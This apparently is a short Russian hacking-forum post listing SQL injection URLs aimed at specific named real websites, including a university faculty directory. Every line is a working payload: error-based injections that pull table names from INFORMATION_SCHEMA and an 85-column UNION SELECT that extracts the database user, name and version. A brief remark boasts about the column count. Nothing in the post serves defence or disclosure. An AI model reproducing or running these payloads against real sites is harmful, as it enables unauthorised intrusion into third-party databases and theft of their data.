http://www.appartment.ru/app.asp?act=press&id=-1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES)--

Сайт: www.nezachetov.net

http://nezachetov.net/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)--

Сайт: www.volgogradinfo.ru

http://www.volgogradinfo.ru/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)--

ггг =) 84 столбца =-O такого я еще не встречал )

http://www.csc.ncsu.edu/directories/faculty_info.php?id=-1670+UNION+SELECT+1,2,3,4,5,user(),7,8,database(), version(),11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,now(),sin(pi()-2),32,33,34,35,36,37,38,39,40,41,42,43,44,45,446,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 ,81,82,83,84,85/*